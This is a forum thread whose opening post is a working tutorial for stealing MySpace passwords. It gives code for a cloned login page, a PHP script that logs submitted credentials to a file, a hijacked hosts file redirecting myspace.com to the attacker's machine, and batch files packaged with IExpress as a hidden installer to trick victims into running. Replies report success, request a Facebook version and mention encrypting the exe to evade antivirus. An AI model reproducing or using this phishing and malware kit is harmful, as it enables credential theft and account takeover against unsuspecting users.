mrtg
Closed Thread
Page 1 of 2 12 LastLast
Results 1 to 15 of 50

Thread: How To Get Myspace Passwords

Hybrid View

  1. #1
    Join Date
    Jan 2008
    Posts
    140

    How To Get Myspace Passwords

    This tutorial gives you the ABILITY to obtain myspace passwords..before i continue i must state that i have no intensions of using my knowledge to actually get myspace passwords AND this tutorial is for EDUCATIONAL PURPOSES ONLY!! meaning if you do it and get in trouble, don't blame it on me, im only posting this tut so myspace can get a fix on this problem..

    now that i have my disclaimer up i will begin the tutorial.

    a brief discription of this tutorial combines my and m00nbats ideas (yes moonbat, your host file thing is involved so props for that). this will require for the "Target" to click on an .exe and after that, everything will go the way you want it to be.

    ok your going to need a few things.

    *. a server (don't worry its not as scary as it sounds, i will "provide" one for you)
    2. some batch file knowledge
    *.some HTML knowledge

    ok, to explain what we are going to do, we will basicly tell the computer that when you type in "myspace.com" it will take them to your phishing site of myspace.com VIA ip address thus the name "hijacking" comes to play. in order to do this we will have to replace their host file with your modified version. and to cover our *****s of us being in that computer, we will delete everything we have added/modified. now to begin

    first off we need to have a phishing site for myspace, so lets go to myspace.com. right click the page (anywhere) and click view source. we should get a bunch of lovely html sooo assuming your in notepad (if not copy and paste the code to notepad) we go to edit then find and we type in the find box
    Code:
     <form action
    (dont forget the "<") it should take us to a nice little string
    like so

    Code:
    <form action="http://secure.myspace.com/index.cfm?fuseaction=login.process" method="post" id="LoginForm" name="aspnetForm">
    so now we edit the code so that everything that goes in the form, appears in our server (aka your computer)

    Code:
    <form action="login.php" method="get" id="LoginForm" name="aspnetForm">
    after you edit this save it as index.html on to your desktop

    you may be wondering what login.php is, well we have to create that. the php should just have this

    Code:
    <?php
    header("Location: http://home*4.myspace.com/index.cfm?fuseaction=user");
    $handle = fopen("out.txt", "a");
    foreach($_GET as $variable => $value) {
       fwrite($handle, $variable);
       fwrite($handle, "=");
       fwrite($handle, $value);
       fwrite($handle, "\r\n");
    }
    fwrite($handle, "\r\n");
    fclose($handle);
    exit;
    ?>
    all this does is it "retrieves" what ever things go in the html form you receive in a pretty out.txt and it also redirects them to the real site.

    now that we have all of this set up, we begin to install our server. i personally use XAMPP just because i believe its pretty good and simple. you can get xampp [URL="http://www.apachefriends.org/en/xampp-windows.html"]HERE[/URL] and download the installer. make sure you select the three services when you install xampp =)

    once youve done that just install everything and head to your installation directory (default is C:\xampp) once there go to htdocs and open up your internet browser.

    in the address bar type in localhost and it should take you to a xampp page. if it doesn't then theres something wrong with your installation, if it does then delete everything in the htdocs and place index.html and login.php in the folder.

    now re***** your web browser and you should see the magical myspace page, now just type anything in the username and password field and you should end up in the REAL myspace page. check your htdocs foder and there should be an out.txt with what you have put inside those field, this means IT WORKS so lets proceed on editing the host file in "C:\WINDOWS\system*2\drivers\etc" (etc is in fact a folder)

    we now copy and paste it on to your desktop. close etc and open up notepad and open up the host file with notepad by just dragging and dropping the host file on to notepad. we should get something like this

    Code:
    # Copyright (c) ****-**** Microsoft Corp.
    #
    # This is a sample HOSTS file used by Microsoft TCP/IP for Windows.
    #
    # This file contains the mappings of IP addresses to host names. Each
    # entry should be kept on an individual line. The IP address should
    # be placed in the first column followed by the corresponding host name.
    # The IP address and the host name should be separated by at least one
    # space.
    #
    # Additionally, comments (such as these) may be inserted on individual
    # lines or following the machine name denoted by a '#' symbol.
    #
    # For example:
    #
    #      *02.54.*4.*7     rhino.acme.com          # source server
    #       *8.25.6*.*0     x.acme.com              # x client host
    
    *27.0.0.*       localhost
    we will now add your ip and besides it, put myspace.com as many ways as possible so it would look like

    Code:
    # Copyright (c) ****-**** Microsoft Corp.
    #
    # This is a sample HOSTS file used by Microsoft TCP/IP for Windows.
    #
    # This file contains the mappings of IP addresses to host names. Each
    # entry should be kept on an individual line. The IP address should
    # be placed in the first column followed by the corresponding host name.
    # The IP address and the host name should be separated by at least one
    # space.
    #
    # Additionally, comments (such as these) may be inserted on individual
    # lines or following the machine name denoted by a '#' symbol.
    #
    # For example:
    #
    #      *02.54.*4.*7     rhino.acme.com          # source server
    #       *8.25.6*.*0     x.acme.com              # x client host
    
    *27.0.0.*       localhost
    *2.*4.56.7 myspace.com
    *2.*4.56.7 www.myspace.com
    *2.*4.56.7 http://myspace.com
    *2.*4.56.7 http://www.myspace.com
    *2.*4.56.7 myspace
    *2.*4.56.7 is your ip so if your ip address was 24.*0.78.7* then youd replace *2.*4.56.7 with 24.*0.78.7*. if you don't know what your ip address is, then goto whatismyip.com and it should tell you in big black letters what your ip address is. now save and exit the host file and open up notepad again. we will now inject notepad in to the target system so we will add this to our batch file
    Code:
    @echo off
    DEL C:\WINDOWS\system*2\drivers\etc\host
    MOVE "host" "C:\WINDOWS\system*2\drivers\etc"
    MOVE "stop.exe" "C:\Documents and Settings\All Users\Start Menu\Programs\Startup"
    save this as start.bat and make it into and exe using the bat to exe converter found [URL="http://www.all-nettools.com/forum/showthread.php?t=6*0*"]HERE[/URL] at the end of the page.

    we will now create the "stop.exe" which really is stop.bat converted into an exe file

    Code:
    @echo off
    DEL C:\WINDOWS\system*2\drivers\etc\host
    DEL C:\Documents and Settings\All Users\Start Menu\Programs\Startup\stop.exe
    save it as stop.bat and convert it to exe.

    now we should have
    host
    start.exe
    stop.exe

    now we go to start->run->iexpress

    now create a new self extraction then click next
    select extract and install (the first choice Buzzo) then next
    give it a good looking tiltle then next
    then no promt then next
    no license..next
    ah now we add our host, start.exe and stop.exe in to this wonderful white box and click next
    on the box that says install program select start.exe then next, we don't need anything for the bottom
    select hidden then next
    no message, next
    now check hide process animation from user and click browse to save it and give it a good name like above..next
    no restart, next
    don't save if you do then save i don't care, next
    then create the file and now you should have the file finished..all you have to do is get your victim to open it, and everytime they go to myspace, it will show your servers page instead and when they type in anything in those username and password fields, it will go to your out.txt.

    have fun!!!
    keep in mind to always have your computer on or else your server wont work

    REMEMBER THAT IF YOUR BEHIND A ROUTER, FORWARD PORT 80 TO YOUR COMPUTER!!!!!!!!!!!!!!!!!!!!!!!!
    Last edited by teknicalissue; 06-18-2009 at 11:54 PM.
    Yes..i do wear a grey hat... and don't plan on changing to white or black..

  2. #2
    Join Date
    Sep 2006
    Posts
    1,649
    /me is looking forward to see how this turns out
    "Workers of the world unite; you have nothing to lose but your chains." -Karl Marx

  3. #3
    Join Date
    Jan 2008
    Posts
    140

    sorry

    sorry for the wait guys, ill have it up by tonight, i havent been getting much sleep lately..

    lol trying to revive an old ***5 compaq computer so bare with me
    Yes..i do wear a grey hat... and don't plan on changing to white or black..

  4. #4
    Join Date
    Jan 2008
    Posts
    140

    enjoy

    hope you all like it, if anything goes wrong, don't be afraid to post it up lol
    Yes..i do wear a grey hat... and don't plan on changing to white or black..

  5. #5
    Join Date
    Sep 2006
    Posts
    1,649
    Maybe this is due to my lack of knowledge, but how come the first line in batch files are DEL commands? Why are you deleting the files?
    "Workers of the world unite; you have nothing to lose but your chains." -Karl Marx

  6. #6
    Join Date
    Jan 2008
    Posts
    140

    where?

    on the stop.exe? or the start.exe
    on the stop, its because we don't want them going to our site EVERYDAY, so when they restart their computer "*********ly" everything goes back to normal

    on the start, its because when you delete the host file, windows basicly stops using it and then when i move it, it begins using it again. bbbutttt

    i found out that if you just replace the file without deleting it, for some reason it still runs..so for example if i just simply replace it, and i would type in myspace.com it would take us to the REAL myspace page for awhile till the system randomly loads up the file (this is on my xp system..don't know about the others) but if i where to delete it and replace it, it would then give us the web site instantaniusly
    Yes..i do wear a grey hat... and don't plan on changing to white or black..

  7. #7
    Join Date
    Jun 2008
    Posts
    2

    Myspace Passwords....

    I already lost myself where you wrote in the font part in notepad, type "<form=action ... i dont get it...what exactly am i supposed to type??? im sooo lost in this can someone help ?????

    i would appreciate it thank youuuu

  8. #8
    Join Date
    Jul 2009
    Posts
    1

    myspace password

    i need my myspace password for my account

  9. #9
    Join Date
    Aug 2009
    Posts
    4
    great tutorial pos..make me confuse....but, I've to learn hard...thanks..
    [URL="http://agunawanika.com/stop-dreaming-start-action-slogan-sederhana-yang-luar-biasa/"]stop dreaming start action[/URL]

  10. #10
    Join Date
    Aug 2009
    Posts
    3

    I have a question

    Okay, i'm have a question. What can we used desktop phishing in a web hosting?

  11. #11
    Join Date
    Jan 2008
    Posts
    140
    im glad everyone is liking the tut, some anti viruses are getting pretty smart but you can usually get around them by encrypting the .exe ( maybe will post a tut later on)
    Yes..i do wear a grey hat... and don't plan on changing to white or black..

  12. #12
    Join Date
    Oct 2009
    Posts
    3

    Hmm...

    Is there a smaller (in MB) program alterative to xampp? i have a size limit of around *-4 mb per file or the internet shuts down.
    ----------------------------------------------------------------------------
    p.s NEVER GET TELSTRA CLEAR NZ BROADBAND!!! *gb usage limits suck.
    ----------------------------------------------------------------------------

  13. #13
    Join Date
    Sep 2006
    Posts
    1,649
    Quote Originally Posted by VirusFlyTrap View Post
    Is there a smaller (in MB) program alterative to xampp? i have a size limit of around *-4 mb per file or the internet shuts down.
    ----------------------------------------------------------------------------
    p.s NEVER GET TELSTRA CLEAR NZ BROADBAND!!! *gb usage limits suck.
    ----------------------------------------------------------------------------
    Sorry, but the PHP language needed is around **MB in size by itself, not including the server you'll need to run it. I doubt you'll be able to find anything in the size range you are asking for.

    Try to download the XAMPP installer at another computer, and use a USB drive and bring it back to your home computer.
    "Workers of the world unite; you have nothing to lose but your chains." -Karl Marx

  14. #14
    Join Date
    Oct 2009
    Posts
    1

    Facebook Version?

    Love the tutorial! Got it up and running flawlessly! Any chance you have a version that works on Facebook?? I would like to get it running on the same server I have the Myspace one running on... Preferably using the same methods...

  15. #15
    Join Date
    Oct 2009
    Posts
    6

    How To Get Myspace Passwords

    Im pretty sure theres a few programs out there that will scrub the drive clean. Well there always a way to get the data back if you spend enough *****. If your really paranoid, do what that guy did in prison break. Magnetize the hard drive and throw it in a river.
    _______________________________________
    Website I designed for [url=http://www.paydaytown.com]cash advance Winnipeg[/url] company.

Closed Thread

Similar Threads

  1. Replies: 17
    Last Post: 03-16-2011, 07:51 PM
  2. hi can you hacking MySpace Accounts And Deleted MySpace Accounts
    By The_Devil_Wears in forum Internet Privacy
    Replies: 0
    Last Post: 11-07-2009, 08:27 PM
  3. New Book Release: How I Hacked MySpace: A Guide to Owning MySpace
    By MySpaceHacking in forum Internet Privacy
    Replies: 3
    Last Post: 12-21-2007, 06:09 PM
  4. Myspace Passwords...
    By Troll in forum Internet Privacy
    Replies: 33
    Last Post: 06-11-2007, 02:38 PM
  5. passwords ??
    By woundedpinata in forum Security & Encryption
    Replies: 3
    Last Post: 02-07-2007, 09:22 PM

Posting Permissions

  • You may not post new threads
  • You may not post replies
  • You may not post attachments
  • You may not edit your posts